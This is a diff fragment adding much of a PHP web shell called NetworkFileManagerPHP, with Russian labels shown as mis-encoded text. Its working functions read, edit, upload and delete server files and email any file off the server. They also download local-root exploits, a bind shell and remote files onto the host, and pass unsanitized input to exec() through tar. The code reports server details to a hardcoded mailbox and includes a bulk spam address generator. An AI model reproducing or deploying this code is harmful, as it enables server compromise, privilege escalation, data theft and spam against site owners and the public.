+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+";
+}
+
+# ïðîñìîòð ôàéëà
+function viewfile($dir,$file) {
+
+ $buf = explode(".", $file);
+ $ext = $buf[sizeof($buf)-1];
+ $ext = strtolower($ext);
+ $dir = str_replace("\\","/",$dir);
+ $fullpath = $dir."/".$file;
+ 
+ switch ($ext) {
+  case "jpg":
+    
+	header("Content-type: image/jpeg");
+    readfile($fullpath);
+    break;
+    case "jpeg":
+	
+    header("Content-type: image/jpeg");
+    readfile($fullpath);
+    break;
+    case "gif":
+	
+    header("Content-type: image/gif");
+    readfile($fullpath);
+    break;
+	 
+	 case "png":
+	
+    header("Content-type: image/png");
+    readfile($fullpath);
+    break;
+    default:
+	
+	 case "avi":	
+    header("Content-type: video/avi");
+    readfile($fullpath);
+
+    break;
+    default:
+	
+	 case "mpeg":	
+    header("Content-type: video/mpeg");
+    readfile($fullpath);
+    break;
+    default:
+	
+	 case "mpg":	
+    header("Content-type: video/mpg");
+    readfile($fullpath);
+    break;
+    default:
+		
+    html();
+	chdir($dir);
+    getdir();
+	
+   echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Ïóòü äî Ôàéëà:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
+   $fp = fopen($fullpath , "r");
+   while (!feof($fp)) {
+    $char = fgetc($fp);
+    $st .= $char;
+   }
+
+   $st = str_replace("&", "&amp;", $st);
+   $st = str_replace("<", "&lt;", $st);
+   $st = str_replace(">", "&gt;", $st);
+
+   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
+   echo $tem;
+   fclose($fp);
+   break;
+ }
+}
+
+# îòïðàâêà ôàéëà íà ìûëî
+function download_mail($dir,$file) {
+ global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
+ $buf = explode(".", $file);
+ $dir = str_replace("\\","/",$dir);
+ $fullpath = $dir."/".$file;
+ $size = tinhbyte(filesize($fullpath));
+ $fp = fopen($fullpath, "rb");
+ while(!feof($fp))
+
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "NetworkFileManagerPHP  ($file)";
+  
+  $boundary = uniqid("NextPart_");
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+  $info = "---==== Ñîîáùåíèå îò ($demail)====---\n\n";
+  $info .= "IP:\t$REMOTE_ADDR\n";
+  $info .= "HOST:\t$HTTP_HOST\n";
+  $info .= "URL:\t$HTTP_REFERER\n";
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+  $send_to = "$demail";             
+   
+  $send = mail($send_to, $subject, $info, $headers);
+  
+  if($send == 2)  
+   echo "<br>
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+	<tr><td align=center>
+	<font color='#FFFFCC' face='Tahoma' size = 2>Ñïàñèáî!!!Ôàéë <b>$file</b> îòïðàâëåí âàì íà <u>$demail</u>.</font></center></td></tr></table><br>";
+
+fclose($fp);
+ }
+
+
+
+function copyfile($dir,$file) {
+ global $action,$tm;
+ $fullpath = $dir."/".$file;
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Èìÿ ôàéëà :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; ñêîïèðîâàí â äåðèêòîðèþ &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>";
+ if (!copy($file, $file.'.bak')){
+   echo (" íåìîãó ñêîïèðîâàòü ôàéë $file");
+   }
+}
+
+
+# ðåäàêòèðîâàíèå ôàéëà
+function editfile($dir,$file) {
+ global $action,$datar;
+ $fullpath = $dir."/".$file;
+ chdir($dir);
+ getdir();
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Èìÿ ôàéëà :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
+ $fp = fopen($fullpath , "r");
+ while (!feof($fp)) {
+  $char = fgetc($fp);
+  $st .= $char;
+ }
+ $st = str_replace("&", "&amp;", $st);
+ $st = str_replace("<", "&lt;", $st);
+ $st = str_replace(">", "&gt;", $st);
+ $st = str_replace('"', "&quot;", $st);
+ echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='Ïîåõàëè' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
+ $datar = $S1;
+ 
+}
+
+# çàïèñü ôàéëà
+function savefile($dir,$file) {
+ global $action,$S1,$tm;
+ $fullpath = $dir."/".$file;
+ $fp = fopen($fullpath, "w");
+ $S1 = stripslashes($S1);
+ fwrite($fp,$S1);
+ fclose($fp);
+ chdir($dir);
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Ôàéë <b>$fullpath</b> îòðåäàêòèðîâàí.</font></td></tr></table>";
+ getdir();
+ readdirdata($tm);
+}
+
+# óäàëåíèå äåðèêòîðèè
+function deletef($dir)
+{
+ global $action,$tm,$fi;
+ $tm = str_replace("\\\\","/",$tm);
+ $link = $tm."/".$fi;
+ unlink($link);
+ chdir($tm);
+ getdir();
+ readdirdata($tm);
+}
+
+# çàãðóçêà ôàéëà
+function uploadtem() {
+ global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Çàãðóçêà ôàéëà:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr></form></table>";
+}
+
+function upload() {
+ global $HTTP_POST_FILES,$tm;
+ echo $set;
+ copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Íå ìîãó çàãðóçèòü ôàéë".$HTTP_POST_FILES["userfile"][name]);
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Ôàéë <b>".$HTTP_POST_FILES["userfile"][name]."</b> óñïåøíî çàãðóæåí.</font></center></td></tr></table>";
+ @unlink($userfile);
+ chdir($tm);
+ getdir();
+ readdirdata($tm);
+}
+
+# çàêà÷êà ýêñïëîéòîâ
+function upload_exploits() {
+ global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
+ 
+ echo "<br>
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>Ïóáëè÷íûå ýêñïëîéòû:</b></td></tr>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>BASH øåë</b> - bindtty.c (ôàéë çàïóñêà <u>s</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_ex[1]</td>
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'>
+ <input type='hidden' name='file2' value='$public[1]'>
+ <input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+  echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (ôàéë çàïóñêà <u>m</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_ex[2]</td>
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'>
+ <input type='hidden' name='file2' value='$public[2]'>
+ <input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (ôàéë çàïóñêà <u>p</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_ex[3]</td>
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'>
+ <input type='hidden' name='file2' value='$public[3]'>
+ <input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+  echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>psyBNC âåðñèÿ:2.3.2-4</b> - psyBNC (ôàéë çàïóñêà <u>./psybnc</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_ex[4]</td>
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[4]'>
+ <input type='hidden' name='file2' value='$public[4]'>
+ <input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+
+ echo "<br>
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>Ïðèâàòíûå ýêñïëîéòû:</b></td></tr>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.*(ôàéë çàïóñêà <u>brk</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[1]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'>
+ <input type='hidden' name='file2' value='$private[1]'>
+ <input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>Ôàéë 1</u></b> (ôàéë çàïóñêà <u>$private[2]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[2]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'>
+ <input type='hidden' name='file2' value='$private[2]'>
+ <input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>Ôàéë 2</u></b> (ôàéë çàïóñêà <u>$private[3]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[3]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'>
+ <input type='hidden' name='file2' value='$private[3]'>
+ <input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+  echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (ôàéë çàïóñêà <u>$private[4]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[4]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[4]'>
+ <input type='hidden' name='file2' value='$private[4]'>
+ <input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+  echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (ôàéë çàïóñêà <u>$private[5]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[5]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'>
+ <input type='hidden' name='file2' value='$private[5]'>
+ <input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+   echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (ôàéë çàïóñêà <u>$private[6]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[6]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'>
+ <input type='hidden' name='file2' value='$private[6]'>
+ <input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+    echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (ôàéë çàïóñêà <u>$private[7]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[7]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'>
+ <input type='hidden' name='file2' value='$private[7]'>
+ <input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+     echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (ôàéë çàïóñêà <u>$private[8]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[8]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'>
+ <input type='hidden' name='file2' value='$private[8]'>
+ <input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+}
+
+
+# ñîçäàíèå íîâîé äåðèêòîðèè
+function newdir($dir) {
+ global $tm,$nd;
+ print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Ñîçäàòü äåðèêòîðèþ:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Cîçäàòü' class=button1 $style_button></td></tr></form></table>");
+}
+
+function cdir($dir) {
+ global $newd,$tm;
+ $fullpath = $dir."/".$newd;
+ if (file_exists($fullpath)) @rmdir($fullpath);
+ if (@mkdir($fullpath,0777)) {
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Äèðåêòîðèÿ ñîçäàíà.</font></center></td></tr></table>";
+ } else {
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Îøèáêà â ñîçäàíèè äåðèêòîðèè.</font></center></td></tr></table>";
+ }
+ chdir($tm);
+ getdir();
+ readdirdata($tm);
+}
+// ñîçäàíèå äååêðèòîðèè Files äëÿ çàãðóçêè ôàéëîâ
+function downfiles() {
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
+$st = getcwd();
+ $st = str_replace("\\","/",$st);
+ $j = 0;
+ $gdir = array();
+ $gsub = array();
+ print("<br>");
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+  if ($st[$i] != "/") {
+   $gdir[$j] = $gdir[$j].$st[$i];
+   $gsub[$j] = $gsub[$j].$st[$i];
+  } else {
+   $gdir[$j] = $gdir[$j]."/";
+   $gsub[$j] = $gsub[$j]."/";
+   $gdir[$j+1] = $gdir[$j];
+   $j++;
+  }
+ }
+print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Ïóòü: </b>");
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+print("</TABLE> ");
+
+echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post>
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>Çàãðóçêà ôàéëîâ ñ óäàëåííîãî êîìïüþòåðà:</b></td></tr>
+ <tr>
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP ïóòü äî ôàéëà:</td>
+ <td width=200><input type='text' name='file3' value='http://' size=40></td>
+ </tr>
+  <tr>
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;Íàçâàíèå ôàéëà èëè ïóòü ñ íàçâàíèåì ôàéëà</td>
+ <td width=200><input type='text' name='file2' value='' size=40></td>
+ </tr>
+  <tr>
+
+ <td width=600 colspan=2 align=center><input type='submit' value='Çàãðóçèòü ôàéë' class=button1 $style_button></td></tr></td>
+ 
+ 
+ </tr></form></table>";
+
+}
+
+# óäàëåíèå äåðèêòîðèè 
+function deldir() {
+ global $dd,$tm;
+ $fullpath = $tm."/".$dd;
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Äèðåêòîðèÿ óäàëåíà.</font></center></td></tr></table>";
+ rmdir($fullpath);
+ chdir($tm);
+ getdir();
+ readdirdata($tm);
+}
+
+# àðõèâàöèÿ äèðåêòîðèè 
+function arhiv() {
+ global $tar,$tm,$pass;
+ $fullpath = $tm."/".$tar;
+
+ echo "<br>
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Äåðèêòîðèÿ <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $pass.tar.gz")."óïàêîâàíà â ôàéë <u>$pass.tar.gz</u></font></center></td></tr></table>";
+ 
+}
+
+function down($dir) {
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
+ ignore_user_abort(1);
+ set_time_limit(0);
+echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Çàãðóçêà ôàéëîâ</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>×àñòåíüêî ñëó÷àåòñÿ, ÷òî íà ñåðâåðàõ ãäå óñòàíîâëåí <b>NFM</b> íå ðàáîòàåò <b>wget</b>, à ôàéë çàãðóçèòü îé êàê õî÷åòñÿ, òàêèì îáðàçîì ñ ïîìîùüþ ïðîñòûõ ôóíêöèé âû ñìîæåòå çàãðóçèòü ëþáîé ôàéë íà ñâîé õîñòèíã â ïàïêó, ãäå çàëèò NFM ëèáî äðóãóþ êàêóþ âû âûáåðåòå (ñì.<b>Ïóòü</b>).( ðàáîòàåò íå íà âñåõ õîñòèíãàõ)</blockquote></td></tr>
+</table>";
+
+if (!isset($status)) downfiles(); 
+
+else 
+{
+
+$data = @implode("", file($file3)); 
+$fp = @fopen($file2, "wb"); 
+@fputs($fp, $data); 
+$ok = @fclose($fp); 
+if($ok) 
+{ 
+$size = filesize($file2)/1024; 
+$sizef = sprintf("%.2f", $size);
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Âû çàãðóçèëè: <b>ôàéë <u>$file2</u> ðàçìåðîì</b> (".$sizef."êÁ) </font></center></td></tr></table>"; 
+} 
+else 
+{ 
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Îøèáêà çàãðóçêè ôàéëà</b></font></center></td></tr></table>"; 
+} 
+} 
+}
+
+# îòïðàâêà ïî÷òû
+function mailsystem() {
+ global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
+ 
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Âîïðîñû è ïîæåëàíèÿ ïî ñêðèïòó NetworkFileManagerPHP</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br>
+<blockquote>
+Â ïðîöåññå ðàáîòû ñî ñêðèïòîì NFM ó âàñ ìîãóò âîçíèêíóòü âîïðîñû è íîâûå ïðåäëîæåíèÿ ïî óëó÷øåíèþ èëè äîáàâëåíèþ ôóíêöèé â NFM, âñå âàøè ïðåäëîæåíèÿ áóäóò ðàññìîòðåíû è áóäóò ðåàëèçîâàíû â äàëüíåéøèõ âåðñèÿõ NFM.
+</blockquote></td></tr>
+</table>";
+ 
+ if (!isset($status)) echo "$form";
+ else {
+  $email_to ="duyt@yandex.ru";
+  $subject = "NetworkFileManagerPHP  ($name)";
+  $headers = "From: $email";
+
+  $info = "---==== Ñîîáùåíèå îò ($name)====---\n\n";
+  $info .= "Name:\t$name\n";
+  $info .= "Email:\t$email\n";
+  $info .= "What?:\n\t$pole\n\n";
+  $info .= "IP:\t$REMOTE_ADDR\n";
+  $info .= "HOST:\t$HTTP_HOST\n";
+  $info .= "URL:\t$HTTP_REFERER\n";
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+  $send_to = "$email_to";             
+   
+  $send = mail($send_to, $subject, $info, $headers);
+  if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Ñïàñèáî!!!Âàøå ñîîáùåíèå îòïðàâëåíî.</font></center></td></tr></table><br>";
+ }
+}
+
+function spam() {
+global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Óíèêàëüíûé ñïàìåð</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> Òåïåðü âàì íå íóæíî ïîêóïàòü ñïàìëèñòû, NFM ñàì â ñîñòîÿíèè ñãåíåðèòü ëþáóþ áàçó, âàëèäíîñòü êîòîðîé áóäåò 50-60% </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>Ãåíåðàòîð email:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;Äàííûé ñïàìåð ðàçáèò íà äâà ýòàïà: <br>
+ &nbsp;<b>1.</b> Ãåíåðàöèÿ email ïî óæå âëîæåííûì äîìåíàì â ñêðèïò èëè ãåíåðàöèÿ email ïî óêàçàííîìó âàìè äîìåíó. Âûáîð êîëëè÷åñòâà ãåíåðèðîâàíûõ ïèñåì ( óáåäèòåëüíàÿ ïðîñüáà ãåíåðèðîâàòü íå áîëüøå <u><i>10 000</i></u> )<br>
+ &nbsp;<b>2.</b> Óêàçàíèå íåîáõîäèìûõ äàííûõ äëÿ ñïàìà</td></tr>
+ <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;Åñëè <b>checked</b> òî äîìåíû ïî äåôîëòó, åñëè íå <b>checked</b> òî âàø äîìåí.</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Ñêîëüêî email ãåíåðèòü:</td>
+<td align=left colspan=2>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;Câîé äîìåí:</td>
+<td align=left width=200>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td>
+</tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Ãåíåðèòü' class=button1 $style_button>
+</td></tr>
+ 
+ </form></table>";
+// ñîãëàñíûå
+function s() {
+   $word="qwrtpsdfghklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+// ãëàñíûå
+function g() {
+   $word="eyuioa";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+// öèôðû
+function c() {
+   $word="1234567890";
+   return $word[mt_rand(0,strlen($word)-3)];
+}
+// ñîãëàñíûå ñ ãëàñíûìè
+function a() {
+   $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma');
+   $ab1=count($word);
+   return $wq=$word[mt_rand(0,$ab1-1)];
+}
+
+function o() {
